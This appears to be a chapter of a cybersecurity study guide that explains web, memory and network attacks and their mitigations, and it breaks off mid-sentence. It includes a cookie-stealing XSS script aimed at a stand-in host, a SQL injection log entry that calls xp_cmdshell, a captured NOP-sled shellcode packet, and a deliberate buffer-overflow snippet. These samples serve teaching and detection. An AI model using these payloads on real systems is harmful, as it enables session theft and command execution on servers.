Extensible Markup Language (XML)
Attack
Extensible Markup Language (XML) is one of the most widely used web languages, and it has come under some criticism. The method currently used to sign data to verify its authenticity has been described as inadequate by some critics, and other criticisms have been directed at the architecture of XML security in general.
One type of Extensible Markup Language (XML)
attack targets the application that parses or reads and
interprets the XML. If the XML input contains a
reference to an external entity and is processed by a
weakly configured XML parser, it can lead to the
disclosure of confidential data, denial of service, server-side request forgery, and port scanning. This is called an
XML external entity attack and is depicted in Figure 7-1.
Figure 7-1 XML External Entity Attack
To address XML-based attacks, eXtensible Access
Control Markup Language (XACML) has been
developed as a standard for an access control policy
language using XML. Its goal is to create an attribute-based access control (ABAC) system that decouples the
access decision from the application or the local
machine. It provides for fine-grained control of activities
based on the following criteria:
• Attributes of the user requesting access (for
example, all division managers in London)
• The protocol over which the request is made (for
example, HTTPS)
• The authentication mechanism (for example,
requester must be authenticated with a certificate)
XACML uses several distributed components, including
• Policy enforcement point (PEP): This entity
protects the resource that the subject (a user or an
application) is attempting to access. When a PEP
receives a request from a subject, it creates an
XACML request based on the attributes of the
subject, the requested action, the resource, and
other information.
• Policy decision point (PDP): This entity
retrieves all applicable policies in XACML and
compares the request with the policies. It
transmits an answer (access or no access) back to
the PEP.
XACML is valuable because it is able to function across
application types. Figure 7-2 illustrates the process flow
used by XACML.
Figure 7-2 XACML
XACML is a good solution when disparate applications
that use their own authorization logic are in use in the
enterprise. By leveraging XACML, developers can
remove authorization logic from an application and
centrally manage access using policies that can be
managed or modified based on business need without
making any additional changes to the applications
themselves.
Structured Query Language (SQL)
Injection
A Structured Query Language (SQL) injection
attack inserts, or “injects,” a SQL query as the input data
from the client to the application. This type of attack can
result in the attacker being able to read sensitive data
from the database, modify database data, execute
administrative operations on the database, recover the
content of a given file, and even issue commands to the
operating system.
Figure 7-3 shows how a regular user might request
information from a database attached to a web server
and also how a hacker might ask for the same
information and get usernames and passwords by
changing the command. While not obvious from the
diagram in Figure 7-3, the attack is prevented by the
security rules in the form of input validation, which
examines all input for malicious characteristics.
Figure 7-3 SQL Injection
The job of identifying SQL injection attacks in logs can
be made easier by using tools such as Microsoft's free Log Parser utility. This command-line utility, which
uses SQL-like commands, can be used to search and
locate errors of a specific type. One type to look for is a
500 error (internal server error), which often indicates a
SQL injection. Example 7-1 shows an example of a log
entry. In this case, the presence of a CREATE TABLE
statement indicates a SQL injection.
Example 7-1 Log Entry with SQL Injection Attack
GET /inventory/Scripts/ProductList.asp
showdetails=true&idSuper=0&browser=pt%showprods&Type=588
idCategory=60&idProduct=66;CREATE%20TABLE%20[X_6624]
([id]%20int%20
NOT%20NULL%20
IDENTITY%20
(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL;
Insert%20into&20[X_6858] (ResultTxt)
%20exec%20master.dbo.xp_
cmdshell11%20'Dir%20D: \';
Insert%20into&20[X_6858]%20values%20('g_over');
exec%20master.dbo.sp_dropextendedeproc%20'xp_cmdshell'
300
The following measures can help you prevent these types
of attacks:
• Use proper input validation.
• Use blacklisting or whitelisting of special
characters.
• Use parameterized queries in ASP.NET and prepared statements in Java to perform escaping of dangerous characters before the SQL statement is passed to the database (a sketch of this approach follows the list).
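To illustrate the parameterized approach, here is a minimal C sketch using the SQLite C API; the users table and column names are hypothetical. Because the user-supplied value is bound to a placeholder, it is always treated as data and can never change the structure of the SQL statement:

#include <sqlite3.h>

int lookup_user_id(sqlite3 *db, const char *username)
{
    sqlite3_stmt *stmt;
    const char *sql = "SELECT id FROM users WHERE name = ?;"; /* ? is a placeholder */
    int id = -1;

    if (sqlite3_prepare_v2(db, sql, -1, &stmt, NULL) != SQLITE_OK)
        return -1;
    /* Bind the untrusted input as data; injected SQL text is not interpreted */
    sqlite3_bind_text(stmt, 1, username, -1, SQLITE_TRANSIENT);
    if (sqlite3_step(stmt) == SQLITE_ROW)
        id = sqlite3_column_int(stmt, 0);
    sqlite3_finalize(stmt);
    return id;
}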
Overflow Attacks
An overflow occurs when an area of memory of some sort
is full and can hold no more information. Any
information that overflows is lost. Overflowing these
memory areas is one of the ways hackers get systems to
perform operations they aren’t supposed to perform (at
least not at that time or under those circumstances). In
some cases, attackers cause these overflows deliberately to permit normally impermissible actions. There are a number of different
types of overflow attacks. They differ mainly in the
type of memory under attack.
Buffer
A buffer is typically an area of memory that is used to
transfer data from one location to another. In some
cases, a buffer is used to hold data from the disk while
data-manipulating operations are performed. A buffer
overflow is an attack that occurs when the amount of
data that is submitted is larger than the buffer can
handle. Typically, this type of attack is possible because
of poorly written application or operating system code.
This can result in an injection of malicious code and can enable attacks such as a denial-of-service (DoS) attack or a SQL injection.
To protect against this issue, organizations should ensure
that all operating systems and applications are updated
with the latest updates, service packs, and patches. In
addition, programmers should properly test all
applications to check for overflow conditions.
A hacker can take advantage of this phenomenon by
submitting too much data, which can cause an error or,
in some cases, enable the hacker to execute commands
on the device if the hacker can locate an area where
commands can be executed. Not all attacks are designed
to execute commands. An attack may just lock up the
system, as in a DoS attack.
A packet containing a long string of no-operation (NOP)
instructions followed by a command usually indicates a
type of buffer overflow attack called a NOP slide. The
purpose of this type of attack is to get the CPU to locate
where a command can be executed. Example 7-2 shows a
packet containing a long string of NOP instructions, as
seen by a sniffer.
Example 7-2 Packet with NOP Slide, As Seen by a
Sniffer
TCP Connection Request
---- 14/03/2019 15:40:57.910
68.144.193.124 : 4560 TCP Connected ID = 1
---- 14/03/2014 15:40:57.910
Status Code: 0 OK
68.144.193.124 : 4560 TCP Data In Length 697 bytes
MD5 = 19323C2EA6F5FCEE2382690100455C17
---- 14/03/2004 15:40:57.920
0000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w
0110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd.........
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f.
0140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p
0150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4
0160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j.
0170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b
0180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{
0190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X.
01A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X..
01B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q.
01C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A..
01D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f.
01E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y.....
01F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f.
0200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b
0210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^......
0220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^...
0230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q.
0240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{
0250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff.......
0260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................
0270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................
0280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................
0290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................
02A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................
Notice the long string of 90s in the middle of the packet;
this string pads the packet and causes it to overrun the
buffer. Example 7-3 shows another buffer overflow
attack.
Example 7-3 Buffer Overflow Attack
#include <string.h>

char *code = "AAAABBBBCCCCDDD"; // including the character '\0', size = 16 bytes

int main()
{
    char buf[8];
    strcpy(buf, code); // copies 16 bytes into an 8-byte buffer
    return 0;
}
In this example, 16 characters are being sent to a buffer
that holds only 8 bytes. With proper input validation, a
buffer overflow attack causes an access violation.
Without proper input validation, the allocated space is
exceeded, and the data at the bottom of the memory
stack is overwritten. The key to preventing many buffer
overflow attacks is input validation, in which any input is
checked for format and length before it is used. Buffer
overflows and boundary errors (when input exceeds the
boundaries allotted for the input) are a family of error
conditions called input validation errors.
Integer Overflow
Integer overflow occurs when math operations try to
create a numeric value that is too large for the available
space. The register width of a processor determines the
range of values that can be represented. Moreover, a
program may assume that a variable always contains a
positive value. If the variable has a signed integer type,
an overflow can cause its value to wrap and become
negative. This may lead to unintended behavior.
Similarly, subtracting from a small unsigned value may
cause it to wrap to a large positive value, which may also
be an unexpected behavior.
You can mitigate integer overflow attacks by doing the following (a checked-addition sketch appears after the list):
• Use strict input validation.
• Use a language or compiler that performs
automatic bounds checks.
• Choose an integer type that contains all possible
values of a calculation. This reduces the need for
integer type casting (changing an entity of one
data type into another), which is a major source of
defects.
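The following minimal C sketch shows the kind of explicit check such a bounds-checking approach performs; because signed overflow is undefined behavior in C, the test must happen before the addition:

#include <limits.h>
#include <stdbool.h>

/* Returns false instead of letting a signed sum wrap around. */
bool checked_add(int a, int b, int *result)
{
    if ((b > 0 && a > INT_MAX - b) ||   /* sum would exceed INT_MAX */
        (b < 0 && a < INT_MIN - b))     /* sum would fall below INT_MIN */
        return false;
    *result = a + b;
    return true;
}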
Heap
A heap is an area of memory that can be increased or decreased in size and is used for dynamic memory allocation. In a typical process layout, this area sits between the program's static data and the memory-mapped region for shared libraries. Overflows that occur in this area are
called heap overflows. An example of an overflow into
the heap area is shown in Figure 7-4.
Figure 7-4 Heap Overflow
Remote Code Execution
Remote code execution attacks comprise a category
of attack types distinguished by the ability of the hacker
to get the local system (user system) to execute code that
resides on another machine, which could be located
anywhere in the world. In some cases the remote code
has been embedded in a website the user visits. In other
cases the code may be injected into the user’s browser.
The key element is that the code came from the hacker
and is executed or injected from a remote location. A
specific form of this attack is shown in Figure 7-5, in
which the target is the local DNS server.
Figure 7-5 Remote Code Execution
Directory Traversal
Like any other server, web servers have a folder
structure. When users access web pages, the content is
found in parts of the structure that are the only parts
designed to be accessible by a web user. One of the ways
malicious individuals are able to access parts of the
directory to which they should not have access is through
a process called directory traversal. If they are able
to break out of the web root folder, they can access
restricted directories and execute commands outside of
the web server’s root directory.
In Figure 7-6, the hacker has been able to access a subfolder of the root, System32, which, as you can see, is where the password files are found. If allowed by the system, this is done by using the ../ technique to back up from the web root to the System32 folder.
Figure 7-6 Directory Traversal
Preventing directory traversal is accomplished by
filtering the user’s input and removing metacharacters.
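One common way to implement this filtering, sketched below in C, is to canonicalize the requested path and then verify that it still falls under the web root; the WEB_ROOT value and function name are hypothetical:

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WEB_ROOT "/var/www/html"   /* hypothetical web root */

FILE *open_under_root(const char *requested)
{
    char full[PATH_MAX], resolved[PATH_MAX];

    snprintf(full, sizeof(full), "%s/%s", WEB_ROOT, requested);
    /* realpath() collapses any ../ sequences into a canonical absolute path */
    if (realpath(full, resolved) == NULL)
        return NULL;                           /* nonexistent or invalid path */
    /* Reject anything that escaped the web root */
    if (strncmp(resolved, WEB_ROOT, strlen(WEB_ROOT)) != 0)
        return NULL;
    return fopen(resolved, "rb");
}

Because the check happens after canonicalization, a request containing ../ sequences resolves to a path outside WEB_ROOT and is refused.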
Privilege Escalation
Privilege escalation is the process of exploiting a bug
or weakness in an operating system to allow a user to
receive privileges to which she is not entitled. These
privileges can be used to delete files, view private
information, or install unwanted programs, such as
viruses. There are two types of privilege escalation:
• Vertical privilege escalation: This occurs
when a lower-privilege user or application
accesses functions or content reserved for higher-privilege users or applications.
• Horizontal privilege escalation: This occurs
when a normal user accesses functions or content
reserved for other normal users.
The following measures can help prevent privilege
escalation:
• Ensure that databases and related systems and
applications are operating with the minimum
privileges necessary to function.
• Verify that users are given the minimum access
required to do their job.
• Ensure that databases do not run with root,
administrator, or other privileged account
permissions, if possible.
Password Spraying
Password spraying is a technique used to identify the
passwords of domain users. Rather than targeting a
single account as in a brute-force attack, password
spraying targets, or “sprays,” multiple accounts with the
same password attempt. Because account lockouts are
based on attempts per account, this technique enables
the attacker to attempt a password against many
accounts at once without locking out any of the accounts.
When performed in a controlled manner (that is, tracking the time since the last attempt against each account and waiting until the lockout counter resets before trying again), an attacker can essentially perform a brute-force attack without locking out accounts. Figure 7-7 shows the process.
Figure 7-7 Password Spraying
Credential Stuffing
Another form of brute-force attack is credential
stuffing. In this case, the malicious individuals have
obtained a password file and need to match the
passwords with the proper accounts. Large numbers of captured (spilled) credentials are automatically entered
into websites until they are potentially matched to an
existing account, which the attackers can then hijack for
their own purposes. This process is usually automated in
some way, as shown in Figure 7-8.
Figure 7-8 Credential Stuffing
To prevent credential stuffing:
• Implement multifactor authentication.
• Regularly check compromised accounts lists and
require password resets for any users who appear
on a list.
• Require periodic password resets for all users.
• Enable CAPTCHAs (challenge–response tests that determine whether the user is human).
Impersonation
Impersonation occurs when one user assumes the
identity of another by acquiring the logon credentials
associated with the account. This typically occurs
through exposure of the credentials either through social
engineering (shoulder surfing, help desk intimidation,
etc.) or by sniffing unencrypted credentials in transit.
The best approach to preventing impersonation is user
education, because many of these attacks rely on the user
committing some insecure activity.
Man-in-the-Middle Attack
A man-in-the-middle attack intercepts legitimate
traffic between two entities. The attacker can then
control information flow and eliminate or alter the
communication between the two parties. Types of man-in-the-middle attacks include
• ARP spoofing: The attacker poisons the ARP
cache on a switch by answering ARP requests for
another computer’s IP address with his own MAC
address. After the ARP cache has been
successfully poisoned, when ARP resolution
occurs, both computers have the attacker’s MAC
address listed as the MAC address that maps to
the other computer’s IP address. As a result, both
are sending to the attacker, placing him “in the
middle.” Two mitigation techniques are available
for preventing ARP poisoning on a Cisco switch:
• Dynamic ARP Inspection (DAI): This
security feature intercepts all ARP requests and
responses and compares each response’s MAC
address and IP address information against the
MAC–IP bindings contained in a trusted
binding table. This table is built by also
monitoring all DHCP requests for IP addresses
and maintaining the mapping of each resulting
IP address to a MAC address (which is a part of
DHCP snooping). If an incorrect mapping is
attempted, the switch rejects the packet.
• DHCP snooping: The main purpose of
DHCP snooping is to prevent a poisoning
attack on the DHCP database. This is not a
switch attack per se, but one of its features can
support DAI. It creates a mapping of IP
addresses to MAC addresses from a trusted
DHCP server that can be used in the validation
process of DAI.
You must implement both DAI and DHCP snooping
because DAI depends on DHCP snooping.
• MAC overflow: Preventing security issues with
switches involves preventing MAC address
overflow attacks. By design, switches place each
port in its own collision domain, which is why a
sniffer connected to a single port on a switch can
only capture the traffic on that port and not traffic
on other ports. However, an attack called a MAC
address overflow attack can cause a switch to fill
its MAC address table with nonexistent MAC
addresses. Using free tools, a hacker can send
thousands of nonexistent MAC addresses to the
switch. The switch can dedicate only a certain
amount of memory for the table, and at some
point, it fills with the bogus MAC addresses. This
prevents valid devices from creating content-addressable memory (CAM) entries (MAC
addresses) in the MAC address table. When this
occurs, all legitimate traffic received by the switch
is flooded out every port. Remember that this is
what switches do when they don’t find a MAC
address in the table. A hacker can capture all the
traffic. Figure 7-9 shows how this type of attack
works.
Figure 7-9 MAC Overflow Attack
VLAN-based Attacks
Enterprise-level switches are capable of creating virtual
local-area networks (VLANs). These are logical
subdivisions of a switch that segregate ports from one
another as if they were in different LANs. VLANs can
also span multiple switches, meaning that devices
connected to switches in different parts of a network can
be placed in the same VLAN, regardless of physical
location. A VLAN adds a layer of separation between
sensitive devices and the rest of the network. For
example, if only two devices should be able to connect to
the HR server, the two devices and the HR server could
be placed in a VLAN separate from the other VLANs.
Traffic between VLANs can occur only through a router.
Routers can be used to implement access control lists
(ACLs) that control the traffic allowed between VLANs.
Table 7-2 lists the advantages and disadvantages of
deploying VLANs.
Table 7-2 Advantages and Disadvantages of VLANs
As you can see, the benefits of deploying VLANs far
outweigh the disadvantages, but there are some VLAN
attacks of which you should be aware. In particular, you
need to watch out for VLAN hopping. By default, a
switch port is an access port, which means it can only be
a member of a single VLAN. Ports that are configured to
carry the traffic of multiple VLANs, called trunk ports,
are used to carry traffic between switches and to routers.
An aim of a VLAN hopping attack is to receive traffic
from a VLAN of which the hacker’s port is not a member.
It can be done two ways:
• Switch spoofing: Switch ports can be set to use
a negotiation protocol called Dynamic Trunking
Protocol (DTP) to negotiate the formation of a
trunk link. If an access port is left configured to
use DTP, it is possible for a hacker to set his
interface to spoof a switch and use DTP to create a
trunk link. If this occurs, the hacker can capture
traffic from all VLANs. Figure 7-10 shows this
process. To prevent this, you should disable DTP
on all switch ports.
Figure 7-10 Switch Spoofing
A switch port can be configured with the following
possible settings:
• Trunk (hard-coded to be a trunk)
• Access (hard-coded to be an access port)
• Dynamic desirable (in which case the port is
willing to form a trunk and actively attempts to
form a trunk)
• Dynamic auto (in which case the port is willing
to form a trunk but does not initiate the
process)
If a switch port is set to either dynamic desirable or
dynamic auto, it would be easy for a hacker to connect a
switch to that port, set his port to dynamic desirable, and
thereby form a trunk. All switch ports should be hard-coded to trunk or access, and DTP should not be used.
You can use the following command set to hard-code a port on a Cisco switch as a trunk port:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode trunk
To hard-code a port as an access port that will never
become a trunk port, thus making it impervious to a
switch spoofing attack, you use this command set:
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode access
• Double tagging: Tags are used on trunk links to
identify the VLAN to which each frame belongs.
A second way to accomplish VLAN hopping on trunk ports is a process called double tagging. In this attack, the
hacker creates a packet with two tags. The first tag
is stripped off by the trunk port of the first switch
it encounters, but the second tag remains,
allowing the frame to hop to another VLAN. This
process is shown in Figure 7-11. In this example,
the native VLAN number between the Company
Switch A and Company Switch B switches has
been changed from the default of 1 to 10.
Figure 7-11 Double Tagging
To prevent this, you do the following:
• Specify the native VLAN (the default VLAN, or
VLAN 1) as an unused VLAN ID for all trunk
ports by specifying a different VLAN number
for the native VLAN. Make sure it matches on
both ends of each link. To change the native
VLAN from 1 to 99, execute this command on
the trunk interface:
switch(config-if)# switchport trunk native
vlan 99
• Move all access ports out of VLAN 1. You can
do this by using the interface range command
for every port on a 12-port switch as follows:
switch(config)# interface range FastEthernet 0/1 - 12
switch(config-if)# switchport access vlan 61
This example places the access ports in
VLAN 61.
• Place unused ports in an unused VLAN. Use
the same command you used to place all ports
in a new native VLAN and specify the VLAN
number.
Session Hijacking
In a session hijacking attack, the hacker attempts to
place himself in the middle of an active conversation
between two computers for the purpose of taking over
the session of one of the two computers, thus receiving
all data sent to that computer. A couple of tools can be
used for this attack. Juggernaut and the Hunt Project
allow the attacker to spy on the TCP session between the
computers. Then the attacker uses some sort of DoS
attack to remove one of the two computers from the
network while spoofing the IP address of that computer
and replacing that computer in the conversation. This
results in the hacker receiving all traffic that was
originally intended for the computer that suffered the
DoS attack. Figure 7-12 shows a session hijack.
Figure 7-12 Session Hijacking
Rootkit
A rootkit is a set of tools that a hacker can use on a
computer after he has managed to gain access and
elevate his privileges to administrator. It gets its name
from the root account, the most powerful account in
Linux-based operating systems. Rootkit tools might
include a backdoor for the hacker to access. This is one of
the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely
remove it.
The following are some of the actions a rootkit can take:
• Installing a backdoor
• Removing all entries from the security log (log
scrubbing)
• Replacing default tools with a compromised
version (Trojaned programs)
• Making malicious kernel changes
Unfortunately, the best defense against rootkits is not to get them in the first place, because they are very difficult to detect and remove. In many cases rootkit
removal renders the system useless. There are some
steps you can take to prevent rootkits, including the
following:
• Monitor system memory for ingress points for a process as it is invoked, keeping track of any imported library calls that may be redirected to other functions.
• Use the Microsoft Safety Scanner to look for
information kept hidden from the Windows API,
the Master File Table, and the directory index.
• Consider products that are standalone rootkit
detection tools, such as Microsoft Safety Scanner
and Malwarebytes Anti-Rootkit 2019.
• Keep the firewall updated.
• Harden all workstations.
Cross-Site Scripting
Cross-site scripting (XSS) occurs when an attacker
locates a website vulnerability and injects malicious code
into the web application. Many websites allow and even
incorporate user input into a web page to customize the
web page. If a web application does not properly validate
this input, one of two things could happen: the text may
be rendered on the page, or a script may be executed
when others visit the web page. Figure 7-13 shows a
high-level view of an XSS attack.
Figure 7-13 High-Level View of a Typical XSS
Attack
The following example of an XSS attack is designed to
steal a cookie from an authenticated user:
<SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
Proper validation of all input should be performed to
prevent this type of attack. This involves identifying all
user-supplied input and testing all output.
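Output encoding typically complements that validation: untrusted data is HTML-encoded before it is rendered, so injected markup displays as text instead of executing. The following is a minimal C sketch of such an encoder (the function name is illustrative):

#include <stdio.h>

/* Writes in to out with HTML metacharacters replaced by entities. */
void html_escape(const char *in, FILE *out)
{
    for (; *in != '\0'; in++) {
        switch (*in) {
        case '<':  fputs("&lt;", out);   break;
        case '>':  fputs("&gt;", out);   break;
        case '&':  fputs("&amp;", out);  break;
        case '"':  fputs("&quot;", out); break;
        case '\'': fputs("&#x27;", out); break;
        default:   fputc(*in, out);      break;
        }
    }
}

Run against the cookie-stealing script above, this encoder emits &lt;SCRIPT&gt;... rather than an executable tag.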
There are three types of XSS attacks:
• Reflected XSS
• Persistent XSS
• Document Object Model (DOM) XSS
Let’s look at how they differ.
Reflected
In a reflected XSS attack (also called a non-persistent
or Type I attack), a web application immediately returns
user input in an error message or search result without
that data being made safe to render in the browser, and
without permanently storing the user-provided data.
Figure 7-14 shows an example of how a reflected XSS
attack works.
Figure 7-14 Reflected XSS Attack
Persistent
A persistent XSS attack (also called a stored or Type II attack) stores the user input on the target server, such as in a database, a message forum, a visitor log, a comment field, and so forth. A victim then retrieves the stored data from the web application without that data being made safe to render in the browser. Figure 7-15 shows an example of a persistent XSS attack.
Figure 7-15 Persistent XSS Attack
Document Object Model (DOM)
With a Document Object Model (DOM) XSS attack
(or Type 0 attack), the entire tainted data flow from
source to sink (a class or function designed to receive
incoming events from another object or function) takes
place in the browser. The source of the data is in the
DOM, the sink is also in the DOM, and the data flow
never leaves the browser. Figure 7-16 shows an example
of this approach.
Figure 7-16 DOM-Based XSS Attack
VULNERABILITIES
Whereas attacks are actions carried out by malicious
individuals, vulnerabilities are characteristics of the
network and software environment in which we operate.
This section describes the various software
vulnerabilities that a cybersecurity analyst should be able
to identify and remediate.
Improper Error Handling
Web applications, like all other applications, suffer from
errors and exceptions, and such problems are to be
expected. However, the manner in which an application
reacts to errors and exceptions determines whether
security can be compromised. One of the issues is that an
error message may reveal information about the system
that a hacker may find useful. For this reason, when
applications are developed, all error messages describing
problems should be kept as generic as possible. Also, you
can use tools such as the OWASP Zed Attack Proxy (ZAP,
introduced in Chapter 4) to try to make applications
generate errors.
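A common pattern, sketched below in C, is to record the detailed cause in an internal log while returning only a generic message to the user; the function and messages are hypothetical:

#include <errno.h>
#include <stdio.h>
#include <string.h>

FILE *open_config(const char *path)
{
    FILE *f = fopen(path, "r");
    if (f == NULL) {
        /* Full detail goes to the internal log only */
        fprintf(stderr, "[internal] fopen(%s): %s\n", path, strerror(errno));
        /* The user sees nothing that reveals paths, versions, or stack traces */
        puts("An error occurred. Please contact support.");
    }
    return f;
}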
Dereferencing
A null-pointer dereference takes place when a pointer
with a value of NULL is used as though it pointed to a
valid memory area. In the following code, the
assumption is that “cmd” has been defined:
String cmd = System.getProperty("cmd");
cmd = cmd.trim();

If it has not been defined, the program throws a null-pointer exception when it attempts to call the trim() method. If an attacker can intentionally trigger a null-pointer dereference, the attacker might be able to use the
resulting exception to bypass security logic or to cause
the application to reveal debugging information.
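The defensive fix is to test the pointer before using it. The following C sketch mirrors the Java example above, using getenv(), which, like getProperty(), returns NULL when the value is undefined:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    const char *cmd = getenv("CMD");   /* may return NULL if CMD is not set */
    if (cmd == NULL) {                 /* check before dereferencing */
        fprintf(stderr, "CMD is not defined\n");
        return 1;
    }
    printf("cmd = %s\n", cmd);
    return 0;
}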
Insecure Object Reference
Applications frequently use the actual name or key of an
object when generating web pages. Applications don’t
always verify that a user is authorized for the target
object. This results in an insecure object reference
flaw. Such an attack on a vulnerability can come from an
authorized user, meaning that the user has permission to
use the application but is accessing information to which
she should not have access. To prevent this problem,
each direct object reference should undergo an access
check. Code review of the application with this specific
issue in mind is also recommended.
Race Condition
A race condition is a vulnerability that targets the normal sequencing of functions. It is an attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome. One type of race condition is the time-of-check/time-of-use vulnerability. In this attack, a system is changed between
a condition check and the display of the check’s results.
For example, consider the following scenario: At 10:00
a.m. a hacker was able to obtain a valid authentication
token that allowed read/write access to the database. At
10:15 a.m. the security administrator received alerts from
the IDS about a database administrator performing
unusual transactions. At 10:25 a.m. the security
administrator reset the database administrator’s
password. At 11:30 a.m. the security administrator was
still receiving alerts from the IDS about unusual
transactions from the same user. In this case, the hacker
created a race condition that disturbed the normal
process of authentication. The hacker remained logged in
with the old password and was still able to change data.
Countermeasures to these attacks are to make critical
sets of instructions either execute in order and in entirety
or to roll back or prevent the changes. It is also best for
the system to lock access to certain items it will access
when carrying out these sets of instructions.
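At the file level, one way to close a time-of-check/time-of-use gap is to make the check and the use refer to the same object. The following C sketch opens the file first and then inspects the already-open descriptor with fstat(), rather than checking a path name that an attacker could swap between steps; the helper name and the O_NOFOLLOW policy are illustrative:

#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

int open_regular_file(const char *path)
{
    /* Open first; O_NOFOLLOW refuses a symlink planted by an attacker */
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;

    struct stat st;
    /* fstat() checks the open descriptor, not the (swappable) path name */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}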
Broken Authentication
When the authentication system is broken, it’s as if
someone has left the front door open. This can lead to a
faster compromise of vulnerabilities discussed in this
section as well as attacks covered in the previous section.
Broken authentication means that a malicious individual
has either guessed or stolen a password, enabling them
to log in as the user with all of the user’s rights. Typical
methods are
• Guessing a password
• Cracking a captured password hash
• Phishing attacks
• Using social engineering such as shoulder surfing
Recall that Chapter 2, “Utilizing Threat Intelligence to
Support Organizational Security,” covered the CVSS
scoring system for vulnerabilities. As a review, the
system uses a metric dedicated to Privileges Required (PR) to describe the level of privileges an attacker must have to exploit the vulnerability. The
metric has three possible values:
• H: Stands for High and means the attacker
requires privileges that provide significant (that
is, administrative) control over the vulnerable
component, allowing access to component-wide
settings and files.
• L: Stands for Low and means the attacker requires
privileges that provide basic user capabilities that
could normally affect only settings and files
owned by a user.
• N: Stands for None and means that the attacker requires no privileges or authentication to exploit the vulnerability.
Sensitive Data Exposure
Sensitive data in this context includes usernames,
passwords, encryption keys, and paths that applications
need to function but that would cause harm if
discovered. Determining the proper method of securing
this information is critical and not easy. In the case of passwords, a generally accepted rule is to not hard-code passwords (although this was not always standard practice), because hard-coded passwords are difficult to change and can be reversed or discovered. If passwords must appear in application code, they should be protected using encryption.
Storing this type of sensitive data in a configuration file
also presents problems. Such files are usually
discoverable, and even if they are hidden, they can be
discovered by using a demo version of the software if it is
a standard or default location. Whatever method you
use, give significant thought to protecting these sensitive
forms of data. The following measures can help you
prevent disclosure of sensitive information from storage:
• Ensure that memory locations where this data is
stored are locked memory.
• Ensure that ACLs attached to sensitive data are
properly configured.
• Implement an appropriate level of encryption.
Insecure Components
There are two types of components, physical and
software. The emphasis in this section is on software
components. An insecure software component is a set of
code that performs a particular function as a part of a
larger system, but does so in a way that creates
vulnerabilities.
The U.S. Department of Homeland Security has
estimated that 90% of software components are
downloaded from code repositories. These repositories
hold code that can be reused. Using these repositories
speeds software development because it eliminates the
time it would take to create these components from
scratch. Organizations might have their own repository
for in-house code that has been developed.
In other cases, developers may make use of a third-party
repository in which the components are sold.
Vulnerabilities exist in much of the code found in third-party repositories. Many have been documented and
disclosed as Common Vulnerabilities and Exposures
